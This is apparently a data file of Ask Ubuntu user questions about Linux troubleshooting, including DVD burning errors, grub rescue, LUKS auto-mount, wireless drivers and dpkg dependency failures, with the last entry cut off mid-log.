379978	k3b iso problem	i was trying to burn zorin os ' iso to a dvd+r in k3b . when it gave me an error message . i might be doing it wrong , so please tell me how if you can . the code is : `` devices -- -- -- -- -- -- -- -- -- -- -- - _nec dvd+-rw nd-3450a 102b ( /dev/sr1 , cd-r , cd-rw , cd-rom , dvd-rom , dvd-r , dvd-rw , dvd+r , dvd+rw , dvd+r dl ) [ dvd-rom , dvd-r sequential , dvd-rw restricted overwrite , dvd-rw sequential , dvd+rw , dvd+r , dvd+r dual layer , cd-rom , cd-r , cd-rw ] [ sao , tao , raw , sao/r96r , raw/r96r , restricted overwrite ] [ % 7 ] hl-dt-st cd-rw gce-8483b b105 ( /dev/sr0 , cd-r , cd-rw , cd-rom ) [ cd-rom , cd-r , cd-rw ] [ sao , tao , raw , sao/r96p , sao/r96r , raw/r16 , raw/r96p , raw/r96r ] [ % 7 ] system -- -- -- -- -- -- -- -- -- -- -- - k3b version : 2.0.2 kde version : 4.8.5 ( 4.8.5 ) qt version : 4.8.1 kernel : 3.5.0-43-generic used versions -- -- -- -- -- -- -- -- -- -- -- - cdrecord : 1.1.11 cdrecord -- -- -- -- -- -- -- -- -- -- -- - /usr/bin/wodim : operation not permitted . warning : can not raise rlimit_memlock limits . scsidev : '/dev/sr1' devname : '/dev/sr1' scsibus : -2 target : -2 lun : -2 linux sg driver version : 3.5.27 wodim version : 1.1.11 scsi buffer size : 64512 beginning dma speed test . set cdr_nodmatest environment variable if device communication breaks or freezes immediately after that . toc type : 1 = cd-rom driveropts : 'burnfree' device type : removable cd-rom version : 5 response format : 2 capabilities : vendor_info : '_nec ' identification : 'dvd+-rw nd-3450a' revision : '102b' device seems to be : generic mmc2 dvd-r/dvd-rw . current : 0x002b ( dvd+r/dl ) profile : 0x002b ( dvd+r/dl ) ( current ) profile : 0x001b ( dvd+r ) profile : 0x001a ( dvd+rw ) profile : 0x0014 ( dvd-rw sequential recording ) profile : 0x0013 ( dvd-rw restricted overwrite ) profile : 0x0011 ( dvd-r sequential recording ) profile : 0x0010 ( dvd-rom ) profile : 0x000a ( cd-rw ) profile : 0x0009 ( cd-r ) profile : 0x0008 ( cd-rom ) using generic scsi-3/mmc dvd-r ( w ) driver ( mmc_mdvd ) . driver flags : swabaudio burnfree supported modes : packet sao drive buf size : 1769472 = 1728 kb fifo size : 12582912 = 12288 kb speed set to 2822 kb/s track 01 : data 1431 mb total size : 1643 mb ( 162:49.17 ) = 732688 sectors lout start : 1643 mb ( 162:51/13 ) = 732688 sectors current secsize : 2048 hint : use dvd+rw-mediainfo from dvd+rw-tools for information extraction . blocks total : 4173824 blocks current : 4173824 blocks remaining : 3441136 starting to write cd/dvd at speed 2.0 in real sao mode for single session . last chance to quit , starting real write in 2 seconds . 1 seconds . 0 seconds . operation starts . dvd_dual_layer_split : read_dvd_structure returns invalid data preparing middle zone location for this dvd+r dual layer disc waiting for reader process to fill input buffer ... errno : 5 ( input/output error ) , reserve track scsi sendcmd : no error cdb : 53 00 00 00 00 00 0b 2e 10 00 status : 0x2 ( check condition ) sense bytes : 70 00 05 00 00 00 00 0a 00 00 00 00 30 05 00 00 sense key : 0x5 illegal request , segment 0 sense code : 0x30 qual 0x05 ( can not write medium - incompatible format ) fru 0x0 sense flags : blk 0 ( not valid ) cmd finished after 0.000s timeout 200s /usr/bin/wodim : can not open new session . input buffer ready . writing time : 0.029s /usr/bin/wodim : fifo had 192 puts and 0 gets . /usr/bin/wodim : fifo was 0 times empty and 0 times full , min fill was 100 % . cdrecord command : -- -- -- -- -- -- -- -- -- -- -- - /usr/bin/wodim -v gracetime=2 dev=/dev/sr1 speed=2 -sao driveropts=burnfree -data -tsize=732688s - ''
379979	what to do if connection failed during installation	i got the following error while installing wine from the terminal . err http : //za.archive.ubuntu.com/ubuntu/ precise/multiverse wine-gecko1.4 amd64 1.4.0-0ubuntu2 connection failed [ ip : 41.73.43.3 80 ] err http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu/ precise/main wine1.4-amd64 amd64 1.4.1-0ubuntu1~precise1~ppa4 connection failed err http : //za.archive.ubuntu.com/ubuntu/ precise/multiverse wine-gecko1.4 i386 1.4.0-0ubuntu2 connection failed [ ip : 41.73.43.3 80 ] err http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu/ precise/main wine1.4-i386 i386 1.4.1-0ubuntu1~precise1~ppa4 connection failed it is installing everything else fine , it just seems to be a select few files that it is not able to download for some reason . why is this ? and what should i do from here to fix the install ? rerun the command in the terminal ? i apologise if this seems simple or common knowledge but i honestly have no idea what to do from here , as a completely new ubuntu user . if there is a way to 'clean up ' this action and reverse what i have done that may also be great . i could then just use the ubuntu software center to download and install wine . i am running ubuntu studio 12.04 much appreciated !
379984	`error : elf header smaller than expected` in grub rescue	i am a complete newbie . i installed ubuntu 12.04 on an old laptop on a clean hard disc it worked well for a while , until various boot-up issues arose details can be supplied , but the position got worse and now all i get is : error : elf header smaller than expected grub rescue > this has been on forum before , but did not help . computer does not activate cd/rom or usb ( whatever order i put the into in bios ) thus boot repair and ubuntu 12.04 discs do not work , nor any other discs nor can i get into grub by hitting shift on boot-up . all i can get is bios and the message above . i have made some progress . command ls shows : ( hd0 ) ( hd0 , msdos5 ) ( hd0 , msdos1 ) . ls ( hd0 , msdos1 ) / shows line `'lost+found/ etc/ media/ bin/ boot/ dev/ home/ lib/ mnt/ opt/ proc/ root/run/ sbin/ selinux/ srv/ sys/ tmp/ usr/ var/ vmlinuz initrd.img cdrom/ desktop/ initrd.img.old vmlinuz.ol .gnome-desktop/ i then type in ls ( hd0,1 ) / produces the same output ls /boot/ shows ./ ../ grub/ system.map-3.8.0-29-generic abi-3.8.0.29- generic config ... and a further 5 lines of similar stuff set prefix= ( hd0,1 ) /boot/grub and all i get again is grub rescue > same for when i type in set root= ( hd0,1 ) . and if i type in insmod normal i get error : elf header smaller than expected grub rescue > i have come to a dead-end . before i give up can anyone confirm that my hard disc can still be broken , even though it comes up with 'grub rescue ' and 'ls ' as described above . if so it might just be worth buying a new hard disc as i suspect it has had it .
379986	luks device disappears after reboot	i 'm trying to configure luks encryption to load on reboot automatically . these are the steps i follow : these are the steps i followed which work perfectly fine on my vagrant box : root @ db01 : ~ # cryptsetup -- verbose -- cipher aes-xts-plain -- key-size 512 -- verify-passphrase luksformat /dev/sda7 warning ! ======== this will overwrite data on /dev/sda7 irrevocably . are you sure ? ( type uppercase yes ) : yes enter luks passphrase : verify passphrase : command successful . root @ db01 : ~ # root @ db01 : ~ # cryptsetup luksopen /dev/sda7 dbenc enter passphrase for /dev/sda7 : root @ db01 : ~ # ls -l /dev/mapper/ total 0 crw -- -- -- - 1 root root 10 , 236 nov 20 05:15 control lrwxrwxrwx 1 root root 7 nov 20 06:36 dbenc - > ../dm-0 root @ db01 : ~ # root @ db01 : ~ # mkfs -t ext4 /dev/mapper/dbenc mke2fs 1.42 ( 29-nov-2011 ) filesystem label= os type : linux block size=4096 ( log=2 ) fragment size=4096 ( log=2 ) stride=0 blocks , stripe width=0 blocks 23175168 inodes , 92689152 blocks 4634457 blocks ( 5.00 % ) reserved for the super user first data block=0 maximum filesystem blocks=4294967296 2829 block groups 32768 blocks per group , 32768 fragments per group 8192 inodes per group superblock backups stored on blocks : 32768 , 98304 , 163840 , 229376 , 294912 , 819200 , 884736 , 1605632 , 2654208 , 4096000 , 7962624 , 11239424 , 20480000 , 23887872 , 71663616 , 78675968 allocating group tables : done writing inode tables : done creating journal ( 32768 blocks ) : done writing superblocks and filesystem accounting information : done root @ db01 : ~ # root @ db01 : ~ # mount /dev/mapper/dbenc /data root @ db01 : ~ # df -h filesystem size used avail use % mounted on /dev/sda6 15g 2.1g 12g 16 % / udev 16g 4.0k 16g 1 % /dev tmpfs 6.3g 284k 6.3g 1 % /run none 5.0m 4.0k 5.0m 1 % /run/lock none 16g 0 16g 0 % /run/shm /dev/sda1 274m 52m 208m 21 % /boot /dev/mapper/dbenc 349g 195m 331g 1 % /data root @ db01 : ~ # root @ db01 : ~ # cryptsetup luksuuid /dev/sda7 d4e9bf92-c8e3-438f-8441-9edccca1d6b0 root @ db01 : ~ # grep d4e9bf92-c8e3-438f-8441-9edccca1d6b0 /etc/crypttab dbenc /dev/disk/by-uuid/d4e9bf92-c8e3-438f-8441-9edccca1d6b0 /etc/keyfile luks root @ db01 : ~ # root @ db01 : ~ # dd if=/dev/urandom of=/etc/keyfile bs=1k count=4 4+0 records in 4+0 records out 4096 bytes ( 4.1 kb ) copied , 0.000651889 s , 6.3 mb/s root @ db01 : ~ # chmod 600 /etc/keyfile root @ db01 : ~ # ls -l /etc/keyfile -rw -- -- -- - 1 root root 4096 nov 20 07:47 /etc/keyfile root @ db01 : ~ # root @ db01 : ~ # cryptsetup luksaddkey /dev/sda7 /etc/keyfile enter any passphrase : root @ db01 : ~ # ls -l /etc/keyfile -rw -- -- -- - 1 root root 4096 nov 20 07:47 /etc/keyfile root @ db01 : ~ # root @ db01 : ~ # blkid |grep dbenc /dev/mapper/dbenc : uuid= '' 3e4f8d12-87ed-4df3-bc07-ff296c5a5749 '' type= '' ext4 '' root @ db01 : ~ # root @ db01 : ~ # grep 3e4f8d12-87ed-4df3-bc07-ff296c5a5749 /etc/fstab uuid=3e4f8d12-87ed-4df3-bc07-ff296c5a5749 /data ext4 defaults 0 2 root @ db01 : ~ # this simply somehow does n't get the encrypted filesystem mounted on the server . it looks like after the reboot , dev mapper device created via luksopen above just simply disappears from the server ? no idea why . that 's the reason why the encrypted device can ; 't be mounted . however once the server boots up , i can open the device manually and mount it just fine : root @ db01 : ~ # cryptsetup luksopen /dev/sda7 dbenc enter passphrase for /dev/sda7 : root @ db01 : ~ # root @ db01 : ~ # mount -a root @ db01 : ~ # df -h filesystem size used avail use % mounted on /dev/sda6 15g 2.1g 12g 16 % / udev 16g 12k 16g 1 % /dev tmpfs 6.3g 288k 6.3g 1 % /run none 5.0m 4.0k 5.0m 1 % /run/lock none 16 g 0 16g 0 % /run/shm /dev/sda1 274m 52m 208m 21 % /boot /dev/mapper/dbenc 349g 195m 331g 1 % /data root @ db01 : ~ # i also tried to avoid uuid mounts and i used the dev mapper device directly with no success : root @ db01 : ~ # grep mapper /etc/fstab /dev/mapper/dbenc /data ext4 defaults 0 2 root @ db01 : ~ # so it looks like luksopen is not being called by system when it boots up ? not sure and i 'm kind of clueless . if you figure out what i 'm doing wrong/missing i 'd very thankful !
379987	i ca n't close , minimize , move my window	the buttons seem to appear , but are not clickable when i use compiz . i do n't have this problem with metacity . i would use compiz , but i want to resolve this bug . thanks for help .
379991	remastering different distros on ubuntu	i want to be able to remaster different distro on my ubuntu 12.x system . i had an old red hat system that i did this on . i had a knoppix that i added a bunch of in-house scripts . also i had the ping ( partimage is not ghost ) that i had changed the ping.rc script . my problem is as hardware progressed , i had issues with drivers , so i am trying to merge them . my first attempt was to remaster knoppix 7.2.0 , which does boot on the targeted hardware . using my old script did not work and when i used a newer knoppix script the create_compress_fs did not exist . 1 ) i saw some things about a slim down ubuntu , so i try that ? the ping.rc is a big perl script and needs to run booted . 2 ) is there a equivalent to create_compress_fs ? let me start here and see if i can refine the questions based on feedback .
379995	centrify integration trouble	the situation : currently running ad with roughly 600 users . print server tracks print jobs for billing . file servers hold files for people and manage permissions ( with active directory ) there are roughly 500 netbooks . maybe 300-400 are being used at one time . the others are broken or in reserve . currently they 're running a combination of windows 7 pro and windows 7 starter . the intent is to make a transition to ubuntu 12.04 . we currently have a 2 netbooks running ubuntu 12.04 , and we 're working on ad integration . the idea is to set them up so you can log in with centrify and point and click to set up printers and access file servers . anyone know of a good way to do this ? edit : the current situation is this : centrify installed on one netbook running ubuntu 12.04 . i need to know the best way to install centrify-integrated samba , for file sharing . and how to make a point-and-click print setup
379996	how to use fdupes to find duplicate files with size greater than a specific value ?	fdupes can return identical images and text files which are usually tiny in size and i have no problem having them duplicated . i 'm more concerned with large files . so is there a way to find duplicate files with a specific size or greater ? other tools suggestions are welcome but a programmatic approach is more welcome . i have a programming background but i 'm new to linux and i 'd like to learn more .
380002	network printer canon mf4370	i have troubles with adding my network canon to ubuntu . every advice i found considered doing it via samba . however my printer is not connected directly to any computer , windows or linux . what to do ? thanks in advance ! : )
380007	how do i install the iwlwifi for intel 3945 802.11g wireless	i found an instruction on the linux laptop wiki to download the ipw3945 module for intel 3945 802.11g wireless in a dell precision m65 , but that page then defers to a newer , more elegant sourceforge project iwlwifi ; when i search for that package in the packages.ubuntu.com i am directed to a file /lib/firmware/iwlwifi-3945-2.ucode linux-firmware there is a linux-firmware package in the saucy repository ( and apt-get says it is already installed ) , but how do i use it to enable this wireless driver ? i did find kernel/drivers/net/wireless/iwlegacy/iwl3945.ko and did sudo modprobe iwl3945 ; dmesg reports wlan0 interface , gives a table of frequencies for cfg80211 and the iwl3945 intel copyright notice but the wireless interface is not enabled and ifconfig wlan0 up returns `` no such device ''
380009	revert from gnome classic to gnome new layout	i 'm a fedora user , and i have recently installed ubuntu 12.04 on a virtual box for some testing . after sudo add-apt-repository ppa : gnome3-team/gnome3 sudo apt-get update sudo apt-get install gnome-shell then i logged out and logged in with gnome session selected ( not gnome classic ) . but instead of gnome 3 , this what i get : after a little search on google i found out that this is the classic gnome look . however i have logged in with session `` gnome '' and not `` gnome classic '' . on fedora , this is what gnome 3 looks like : can someone help me with this ? i have seen many threads for how to revert to the classic look , but i have n't seen anything like this .
380010	dell vostro 1500 wifi not working	i need help locating the wifi drivers . i ubuntu 12.04 lts and my wifi is not working . i have not been able to locate the drivers that are needed for this os . i am new to this os and have been a window users for a extended amount of time .
380015	finding certain strings with grep ( or similar )	i have two parts of a string that i know , called phrase1 and phrase2 that are in the same line of a file that occur multiple times throughout the file . i need to extract these lines from the file ; however , there are numbers in between that i do not know and the lines can vary . for instance , there are lines that may look like : phrase1 654654 phrase2 phrase1 22 phrase2 phrase1 949 phrase2 etc . however , i do know that i can write a code specifically for a particular line . for instance , i can write for line 2 above the following to find it : grep `` phrase1 [ 0-9 ] [ 0-9 ] phrase2 '' file what code can i write using grep ( or similar ) in order to extract all the lines containing both phrase1 and phrase2 without knowing the numbers , or anything else for that matter , in between ?
380019	incorrect cpu clock speed ?	i have recently purchased a new laptop , and installed ubuntu . it uses an amd a8-4500m processor , which , according to the link below , should have a clock speed of 1900-2800 mhz . http : //www.notebookcheck.net/amd-a-series-a8-4500m-notebook-processor.74884.0.html when i use the `` cat /proc/cpuinfo | grep name '' command , it says the cpu speed is only 1400mhz . could someone please explain why this is ? thanks jimmy @ jimmy-lenovo-g505s : ~ $ cat /proc/cpuinfo | grep name model name : amd a8-4500m apu with radeon ( tm ) hd graphics model name : amd a8-4500m apu with radeon ( tm ) hd graphics model name : amd a8-4500m apu with radeon ( tm ) hd graphics model name : amd a8-4500m apu with radeon ( tm ) hd graphics jimmy @ jimmy-lenovo-g505s : ~ $ lscpu architecture : x86_64 cpu op-mode ( s ) : 32-bit , 64-bit byte order : little endian cpu ( s ) : 4 on-line cpu ( s ) list : 0-3 thread ( s ) per core : 2 core ( s ) per socket : 2 socket ( s ) : 1 numa node ( s ) : 1 vendor id : authenticamd cpu family : 21 model : 16 stepping : 1 cpu mhz : 1400.000 bogomips : 3792.81 virtualisation : amd-v l1d cache : 16k l1i cache : 64k l2 cache : 2048k numa node0 cpu ( s ) : 0-3
380021	auto suggest movie player	i have a minor , but annoying problem . whenever i used to insert a dvd , a dialog box would appear in the top right of the window asking if i want to open the dvd with movie player . ( it did this from install ) i recently had to wipe & re install ubuntu studio 12.04 and now this feature has dissapeared . any ideas would be greatly appreciated
380022	k3b iso burn problem	i was trying to burn zorin os ' iso to a dvd+r in k3b . when it gave me an error message . i might be doing it wrong , so please tell me how if you can . the code is : '' devices_nec dvd+-rw nd-3450a 102b ( /dev/sr1 , cd-r , cd-rw , cd-rom , dvd-rom , dvd-r , dvd-rw , dvd+r , dvd+rw , dvd+r dl ) [ dvd-rom , dvd-r sequential , dvd-rw restricted overwrite , dvd-rw sequential , dvd+rw , dvd+r , dvd+r dual layer , cd-rom , cd-r , cd-rw ] [ sao , tao , raw , sao/r96r , raw/r96r , restricted overwrite ] [ % 7 ] hl-dt-st cd-rw gce-8483b b105 ( /dev/sr0 , cd-r , cd-rw , cd-rom ) [ cd-rom , cd-r , cd-rw ] [ sao , tao , raw , sao/r96p , sao/r96r , raw/r16 , raw/r96p , raw/r96r ] [ % 7 ] system -- -- -- -- -- -- -- -- -- -- -- - k3b version : 2.0.2 kde version : 4.8.5 ( 4.8.5 ) qt version : 4.8.1 kernel : 3.5.0-43-generic used versions cdrecord : 1.1.11 cdrecord -- -- -- -- -- -- -- -- -- -- -- - /usr/bin/wodim : operation not permitted . warning : can not raise rlimit_memlock limits . scsidev : '/dev/sr1' devname : '/dev/sr1' scsibus : -2 target : -2 lun : -2 linux sg driver version : 3.5.27 wodim version : 1.1.11 scsi buffer size : 64512 beginning dma speed test . set cdr_nodmatest environment variable if device communication breaks or freezes immediately after that . toc type : 1 = cd-rom driveropts : 'burnfree' device type : removable cd-rom version : 5 response format : 2 capabilities : vendor_info : '_nec ' identification : 'dvd+-rw nd-3450a' revision : '102b' device seems to be : generic mmc2 dvd-r/dvd-rw . current : 0x002b ( dvd+r/dl ) profile : 0x002b ( dvd+r/dl ) ( current ) profile : 0x001b ( dvd+r ) profile : 0x001a ( dvd+rw ) profile : 0x0014 ( dvd-rw sequential recording ) profile : 0x0013 ( dvd-rw restricted overwrite ) profile : 0x0011 ( dvd-r sequential recording ) profile : 0x0010 ( dvd-rom ) profile : 0x000a ( cd-rw ) profile : 0x0009 ( cd-r ) profile : 0x0008 ( cd-rom ) using generic scsi-3/mmc dvd-r ( w ) driver ( mmc_mdvd ) . driver flags : swabaudio burnfree supported modes : packet sao drive buf size : 1769472 = 1728 kb fifo size : 12582912 = 12288 kb speed set to 2822 kb/s track 01 : data 1431 mb total size : 1643 mb ( 162:49.17 ) = 732688 sectors lout start : 1643 mb ( 162:51/13 ) = 732688 sectors current secsize : 2048 hint : use dvd+rw-mediainfo from dvd+rw-tools for information extraction . blocks total : 4173824 blocks current : 4173824 blocks remaining : 3441136 starting to write cd/dvd at speed 2.0 in real sao mode for single session . last chance to quit , starting real write in 2 seconds . 1 seconds . 0 seconds . operation starts . dvd_dual_layer_split : read_dvd_structure returns invalid data preparing middle zone location for this dvd+r dual layer disc waiting for reader process to fill input buffer ... errno : 5 ( input/output error ) , reserve track scsi sendcmd : no error cdb : 53 00 00 00 00 00 0b 2e 10 00 status : 0x2 ( check condition ) sense bytes : 70 00 05 00 00 00 00 0a 00 00 00 00 30 05 00 00 sense key : 0x5 illegal request , segment 0 sense code : 0x30 qual 0x05 ( can not write medium - incompatible format ) fru 0x0 sense flags : blk 0 ( not valid ) cmd finished after 0.000s timeout 200s /usr/bin/wodim : can not open new session . input buffer ready . writing time : 0.029s /usr/bin/wodim : fifo had 192 puts and 0 gets . /usr/bin/wodim : fifo was 0 times empty and 0 times full , min fill was 100 % . cdrecord command : -- -- -- -- -- -- -- -- -- -- -- - /usr/bin/wodim -v gracetime=2 dev=/dev/sr1 speed=2 -sao driveropts=burnfree -data -tsize=73268
380023	why did the installation option to remove ubuntu and reinstall remove windows partitions ?	i installed ubuntu 13.10 alongside windows 8 a couple days ago . today i tried to set up l2tp following some complicated tutorial on the web , messed up some configuration files , and since it was a fresh installation , i have decided to simply reinstall the os . after booting from usb stick , i 've chosen install ubuntu from the menu . on the next screen , i selected remove ubuntu and reinstall . underneath the caption , there was a warning saying that i will loose my ubuntu files , profile music and stuff . nothing at all was said about my windows partition , only about ubuntu . i had ubuntu installed to a separate 50gb partition , so i continued . after ubuntu was installed , i 've noticed that windows is gone from the boot loader . i also could n't access windows partitions from ubuntu . finally , i 've launched gparted and see this : have i really just deleted all my windows files ? looks like so . i know there 's plenty of data recovery questions on au , so mine will be : what is remove ubuntu and reinstall option supposed to do , and why it has affected the windows installation in such a way ? and of course , i did n't make any backups .
380024	resume from suspend - all programs are closed 12.04	i 'm using a macbook pro 6,1 and have jumped through a few hoops to get to where i am . i finally have a working system , but there 's one thing i have n't been able to find a solution on . when i close my lid on my macbook it goes to suspend mode . when i open my macbook again it wakes and goes back to my desktop . only problem is it wo n't load the windows i previously had open . it 's as if i logged out instead of my computer going into suspend . is there any way to get my programs not to close when i close my laptop ? i have the latest nvidia drivers installed .
380026	sudo unable to resolve host ?	i enter this command in putty : sudo ln -s /usr/share/phpmyadmin/ /var/www/phpmyadmin but it returns : sudo : unable to resolve host mysite.com any suggestions on how i can fix this ?
380027	problem logging in through a proxy	i am using ubuntu two different ways , one is a ubuntu 13.10 live-cd ; the other , a normal 13.10 installation but with all security updates . in both cases using firefox . the first can connect without problems to my school 's internet , the second no matter what i do , ca n't . when things work out , i try to reach a web-page , get forwarded to a login screen , input my credentials and it grants me access to the internet . iexplorer under windows 7 is also working . firefox under windows too . in no case is javascript or pop-ups blocked ( there is no pop-up anyway ) . i activated `` warn me when websites try to redirect in firefox '' , to no avail . i also changed the proxy method to/from autodetect , system proxy , and no proxy . still nothing . how can i repair this ? can i disable some settings ? or just clone the setting of the live ubuntu into the normal ubuntu installation ?
380029	the old wireless autoconnect problem	when i start up my usb wireless network adapter , it is not recognized . after several , repeated efforts of pulling the adapter in and out of different slotsz it is found after about 20 minutes . really frustrating ! lspci yields : 00:14.1 ide interface : advanced micro devices , inc. [ amd/ati ] ixp sb4x0 ide controller 00:14.3 isa bridge : advanced micro devices , inc. [ amd/ati ] ixp sb4x0 pci-isa bridge 00:14.4 pci bridge : advanced micro devices , inc. [ amd/ati ] ixp sb4x0 pci-pci bridge 00:14.5 multimedia audio controller : advanced micro devices , inc. [ amd/ati ] ixp sb400 ac'97 audio controller ( rev 02 ) 00:18.0 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] miscellaneous control 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rs480 [ radeon xpress 200 series ] 01:05.1 display controller : advanced micro devices , inc. [ amd/ati ] rs480 [ radeon xpress 200 series ] ( secondary ) 02:00.0 ethernet controller : broadcom corporation netxtreme bcm5751 gigabit ethernet pci express ( rev 20 ) ifconfig gives : eth0 link encap : ethernet hwaddr 00:16:17:7b:32 : ea up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:3044 errors:0 dropped:0 overruns:0 frame:0 tx packets:3044 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:241028 ( 241.0 kb ) tx bytes:241028 ( 241.0 kb ) wlan0 link encap : ethernet hwaddr 00:1a:9f:90:86 : d8 inet addr:192.168.0.2 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :21a:9fff : fe90:86d8/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2262 errors:0 dropped:0 overruns:0 frame:0 tx packets:2265 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2037550 ( 2.0 mb ) tx bytes:321595 ( 321.5 kb ) lsusb : bus 001 device 082 : id 0ace:1215 zydas zd1211b 802.11g bus 001 device 045 : id 1058:1001 western digital technologies , inc . external hard disk [ elements ] bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub ( this when i finally have a connection . ) can anyone help me , please ?
380031	error in updates , processing initramfs	what can i do with this error message ? `` brokencount > 0 '' reading database ... 957130 files and directories currently installed . ) preparing to replace initramfs-tools-bin 0.99ubuntu13.2 ( using ... /initramfs-tools-bin_0.99ubuntu13.4_amd64.deb ) ... unpacking replacement initramfs-tools-bin ... setting up initramfs-tools-bin ( 0.99ubuntu13.4 ) ... dpkg : dependency problems prevent configuration of initramfs-tools : initramfs-tools depends on initramfs-tools-bin ( < < 0.99ubuntu13.1.1~ ) ; however : version of initramfs-tools-bin on system is 0.99ubuntu13.4 . dpkg : error processing initramfs-tools ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of udev : udev depends on initramfs-tools ( > = 0.92bubuntu63 ) ; however : package initramfs-tools is not configured yet . dpkg : error processing udev ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of apparmor : apparmor depends on initramfs-tools ; however : package initramfs-tools is not configured yet . dpkg : error processing apparmor ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of plymouth : plymouth depends on udev ( > = 166-0ubuntu4 ) ; however : package udev is not configured yet . plymouth depends on initramfs-tools ; howno apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already ever : package initramfs-tools is not configured yet . dpkg : error processing plymouth ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of lightdm : lightdm depends on plymouth ( > = 0.8.2-2ubuntu31.1 ) ; however : package plymouth is not configured yet . dpkg : error processing lightdm ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of network-manager : network-manager depends on udev ; however : package udev is not configured yet . dpkg : error processing network-manager ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of plymouth-theme-ubuntu-text : plymouth-theme-ubuntu-text depends on plymouth ; however : package plymouth is not configured yet . dpkg : error processing plymouth-theme-ubuntu-text ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of apparmor-utils : apparmor-utils depends on apparmor ( > = 2.6.1-4ubuntu1 ) ; however : package apparmor is not configured yet . dpkg : error processing apparmor-utils ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of plymouth-label : plymouth-label depends on plymouth ( = 0.8.2-2ubuntu31.1 ) ; however : package plymouth is not configured yet . dpkg : error processing plymouth-label ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of plymouth-theme-ubuntu-logo : plymouth-theme-ubuntu-logo depends on plymouth ; however : package plymouth is not configured yet . plymouth-theme-ubuntu-logo depends on plymouth-label ; however : package plymouth-label is not configured yet . dpkg : error processing plymouth-theme-ubuntu-logo ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of plymouth-x11 : plymouth-x11 depends on plymouth ( = 0.8.2-2ubuntu31.1 ) ; however : package plymouth is not configured yet . dpkg : error processing plymouth-x11 ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : initramfs-tools udev apparmor plymouth lightdm network-manager plymouth-theme-ubuntu-text apparmor-utils plymouth-label plymouth-theme-ubuntu-logo plymouth-x11 error in function : dpkg : dependency problems prevent configuration of initramfs-tools : initramfs-tools depends on initramfs-tools-bin ( < < 0.99ubuntu13.1.1~ ) ; however : version of initramfs-tools-bin on system is 0.99ubuntu13.4 . dpkg : error processing initramfs-tools ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of plymouth : plymouth depends on initramfs-tools ; however : package initramfs-tools is not configured yet . dpkg : error processing plymouth ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of lightdm : lightdm depends on plymouth ( > = 0.8.2-2ubuntu31.1 ) ; however : package plymouth is not configured yet . dpkg : error processing lightdm ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of udev : udev depends on initramfs-tools ( > = 0.92bubuntu63 ) ; however : package initramfs-tools is not configured yet . dpkg : error processing udev ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of apparmor : apparmor depends on initramfs-tools ; however : package initramfs-tools is not configured yet . dpkg : error processing apparmor ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of plymouth-x11 : plymouth-x11 depends on plymouth ( = 0.8.2-2ubuntu31.1 ) ; however : package plymouth is not configured yet . dpkg : error processing plymouth-x11 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of plymouth-theme-ubuntu-logo : plymouth-theme-ubuntu-logo depends on plymouth ; however : package plymouth is not configured yet . dpkg : error processing plymouth-theme-ubuntu-logo ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of plymouth-theme-ubuntu-text : plymouth-theme-ubuntu-text depends on plymouth ; however : package plymouth is not configured yet . dpkg : error processing plymouth-theme-ubuntu-text ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of plymouth-label : plymouth-label depends on plymouth ( = 0.8.2-2ubuntu31.1 ) ; however : package plymouth is not configured yet . dpkg : error processing plymouth-label ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of apparmor-utils : apparmor-utils depends on apparmor ( > = 2.6.1-4ubuntu1 ) ; however : package apparmor is not configured yet . dpkg : error processing apparmor-utils ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of network-manager : network-manager depends on udev ; however : package udev is 